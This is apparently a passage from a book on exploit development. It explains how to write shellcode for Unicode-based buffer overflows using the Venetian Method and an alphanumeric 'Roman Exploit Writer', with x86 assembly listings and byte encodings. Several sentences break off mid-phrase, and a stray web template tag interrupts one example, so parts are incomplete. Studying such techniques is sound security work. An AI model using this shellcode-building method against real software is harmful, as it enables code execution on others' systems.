In order to exploit a Unicode-based buffer overflow, we first need a mechanism to transfer the process's
0x007700FF inc ecx 0x00770100 push ecx 0x00770101 call ebx
We'd overwrite the saved return address/exception handler with
0x007700FF
, and execution would transfer to this address. When execution takes up at this point, the
ECX
register is incremented by 1 and
Assuming you do find a way to return to the user-supplied buffer, the
When exploiting a Unicode-based vulnerability, the arbitrary code executed must be of a form in which each second byte is a null and the other is non-null. This obviously makes for a limited set of instructions available to you. Instructions available to the Unicode exploit developer are all those single-byte operations that include such instructions as push , pop , inc , and dec . Also available are the instructions with a byte form of
nn00nn
such as:
mul eax, dword ptr[eax],0x00nn
Alternatively, you may find
{% if main.adsdop %}{% include 'adsenceinline.tpl' %}{% endif %}nn00nn00nn
such as:
imul eax, dword ptr[eax],0x00nn00nn
Or, you could find many add-based instructions of the form
00nn00
where two single-byte instructions are used one after the other, as in this code fragment:
00401066 50 push eax 00401067 59 pop ecx
The instructions must be separated with a nop -equivalent of the form 00 nn 00 to make it Unicode in nature. One such choice could be:
00401067 00 6D 00 add byte ptr [ebp],ch
Of course, for this method to succeed, the address pointed to by EBP must be writable. If it isn't, choose another; we've listed many more later in this section. When embedded between the push and the pop we get:
00401066 50 push eax 00401067 00 6D 00 add byte ptr [ebp],ch 0040106A 59 pop ecx
These are Unicode in nature:
\x50\x00\x6D\x00\x59
Writing a full-featured exploit using such a limited instruction set is extremely difficult, to say the least. So what can be done to make the task easier? Well, you could use the limited set of available instructions to create the real exploit code on the fly, as is done using the Venetian technique described in Chris Anley's paper. This method
Let's look at an example. Before the exploit writer begins executing, the destination buffer could be:
\x41\x00\x43\x00\x45\x00\x47\x00
When the exploit writer starts, it replaces the first null with 0x42 to give us
\x41\x42\x43\x00\x45\x00\x47\x00
The
\x41\x42\x43\x44\x45\x00\x47\x00
The process is repeated until the final full-featured "real" exploit remains.
\x41\x42\x43\x44\x45\x46\x47\x48
As you can see, it's much like Venetian blinds closing ”hence the
To set each null byte to its appropriate value, the exploit writer needs at least one register that points to the first null byte of the half-filled buffer when it starts its work. Assuming EAX points to the first null byte, it can be set with the following instruction:
00401066 80 00 42 add byte ptr [eax],42h
Adding
0x42
to
0x00
, needless to say, gives us
0x42
.
EAX
then must be incremented twice to point to the next null byte; then it too can be filled. But remember, the exploit writer part of the exploit code needs to be Unicode in nature, so it should be
00401066 80 00 42 add byte ptr [eax],42h 00401069 00 6D 00 add byte ptr [ebp],ch 0040106C 40 inc eax 0040106D 00 6D 00 add byte ptr [ebp],ch 00401070 40 inc eax 00401071 00 6D 00 add byte ptr [ebp],ch
This is 14 bytes (7 wide characters) of instruction and 2 bytes (1 wide character) of storage, which makes 16 bytes (8 wide
Although Chris's code is small (relatively speaking), which is a benefit, the problem is that one of the bytes of code has a value of
0x80
. If the exploit is first sent as an ASCII-based string and then converted to Unicode by the vulnerable process, depending on the code page in use during the conversion routine, this byte may get mangled. In addition, when replacing a null byte with a value greater than
0x7F
, the same problem creeps in ”the exploit code may get mangled and thus fail to work. To solve this we need to create an exploit writer that uses only characters
0x20
to
0x7F
. An even better solution would be to use only
Our task is to develop a Unicode-type exploit that, using the Venetian Method, creates arbitrary code on the fly using only ASCII letters and numbers from the Roman alphabet ”a Roman Exploit Writer, if you will. We have several
0040B55E 6A 00 push 0 0040B560 5B pop ebx 0040B564 43 inc ebx 0040B568 53 push ebx 0040B56C 54 push esp 0040B570 58 pop eax 0040B574 6B 00 39 imul eax,dword ptr [eax],39h 0040B57A 50 push eax 0040B57E 5A pop edx 0040B582 54 push esp 0040B586 58 pop eax 0040B58A 6B 00 69 imul eax,dword ptr [eax],69h 0040B590 50 push eax 0040B594 5B pop ebx
Assuming
ECX
already contains the pointer to the first null byte (and we'll deal with this aspect later), this piece of code starts by pushing
0x00000000
onto the top of the stack, which is then popped off into the
EBX
register.
EBX
now holds the value
. We then increment
EBX
by
1
and push this on to the stack. Next, we push the address of the top of the stack onto the top, then
pop
into
EAX
.
EAX
now holds the memory address of the
1
. We now multiply
1
by
0x39
to give
0x39
, and the result is stored in
EAX
. This is then
We then push the address of the 1 onto the top of the stack again with the push esp instruction, and again pop it into EAX . EAX contains the memory address of the 1 again. We multiply this 1 by 0x69 , leaving this result in EAX . We then push the result onto the stack and pop it into EBX . EBX / BL now contains the value 0x69 . Both BL and DL will come into play later when we need to write out a byte with a value greater than 0x7F . Moving on to the code that forms the implementation of the Venetian Method, and again with the nop -equivalents removed for clarity, we have:
0040B5BA 54 push esp 0040B5BE 58 pop eax 0040B5C2 6B 00 41 imul eax,dword ptr [eax],41h 0040B5C5 00 41 00 add byte ptr [ecx],al 0040B5C8 41 inc ecx 0040B5CC 41 inc ecx
Remembering that we have the value 0x00000001 at the top of the stack, we push the address of the 1 onto the stack. We then pop this into EAX, so EAX now contains the address of the 1 . Using the imul operation, we multiply this 1 by the value we want to write out ”in this case, 0x41 . EAX now holds 0x00000041 , and thus AL holds 0x41 . We add this to the byte pointed to by ECX ”remember this is a null byte, and so when we add 0x4 1 to 0x0 0 we're left with 0x41 ”thus closing the first "blind." We then increment ECX twice to point to the next null byte, skipping the non-null byte, and repeat the process until the full code is written out.
Now what happens if you need to write out a byte with a value greater than 0x7F ? We'll this is where BL and DL come into play. What follows are a few variations on the above code that deals with this situation.
Assuming the null byte in question should be replaced with a byte in the range of 0x7F to 0xAF , for example 0x94 ( xchg eax,esp ) we would use the following code:
0040B5BA 54 push esp 0040B5BE 58 pop eax 0040B5C2 6B 00 5B imul eax,dword ptr [eax],5Bh 0040B5C5 00 41 00 add byte ptr [ecx],al 0040B5C8 46 inc esi 0040B5C9 00 51 00 add byte ptr [ecx],dl // <---- HERE 0040B5CC 41 inc ecx 0040B5D0 41 inc ecx
Notice what is going on here. We first write out the value 0x5B to the null byte and then add the value in DL to it ” 0x39 . 0x39 plus 0x5B is 0x94 . Incidentally, we insert an INC ESI as a nop -equivalent to avoid incrementing ECX too early and adding 0x39 to one of the non-null bytes.
If the null byte to be replaced should have a value in the range of 0xAF to 0xFF , for example, 0xC3 ( ret) , use the following code:
0040B5BA 54 push esp 0040B5BE 58 pop eax 0040B5C2 6B 00 5A imul eax,dword ptr [eax],5Ah 0040B5C5 00 41 00 add byte ptr [ecx],al 0040B5C8 46 inc esi 0040B5C9 00 59 00 add byte ptr [ecx],bl // <---- HERE 0040B5CC 41 inc ecx 0040B5D0 41 inc ecx
In this case, we're doing the same thing, this time using BL to add 0x69 to where the byte points. This is done by using ECX , which has just been set to 0x5A . 0x5A plus 0x69 equals 0xC3 , and thus we have written out our ret instruction.
What if we need a value in the range of 0x00 to 0x20 ? In this case, we simply overflow the byte. Assuming we want the null byte replaced with 0x06 ( push es ), we'd use this code:
0040B5BA 54 push esp 0040B5BE 58 pop eax 0040B5C2 6B 00 64 imul eax,dword ptr [eax],64h 0040B5C5 00 41 00 add byte ptr [ecx],al 0040B5C8 46 inc esi 0040B5C9 00 59 00 add byte ptr [ecx],bl // <--- BL == 0x69 0040B5CC 46 inc esi 0040B5CD 00 51 00 add byte ptr [ecx],dl // <--- DL == 0x39 0040B5D0 41 inc ecx 0040B5D4 41 inc ecx
0x60 plus 0x69 plus 0x39 equals 0x106 . But a byte can only hold a maximum value of 0xFF , and so the byte "overflows," leaving 0x06 .
This method can also be used to adjust non-null bytes if they're not in the range 0x20 to 0x7F . What's more, we can be efficient and do something useful with one of the nop -equivalents ”let's use this method and make it non- nop -equivalent. Assuming, for example, that the non-null byte should be 0xC3 ( ret ), initially we would set it to 0x5A . We would make sure to do this before calling the second inc ecx , when setting the null byte, before this non-null byte. We could adjust it as follows:
0040B5BA 54 push esp 0040B5BE 58 pop eax 0040B5C2 6B 00 41 imul eax,dword ptr [eax],41h 0040B5C5 00 41 00 add byte ptr [ecx],al 0040B5C8 41 inc ecx // NOW ECX POINTS TO THE 0x5A IN THE DESTINATION BUFFER 0040B5C9 00 59 00 add byte ptr [ecx],bl // <-- BL == 0x69 NON-null BYTE NOW EQUALS 0xC3 0040B5CC 41 inc ecx 0040B5CD 00 6D 00 add byte ptr [ebp],ch
We repeat these actions until our code is complete. We're left then with the question: What code do we really want to execute?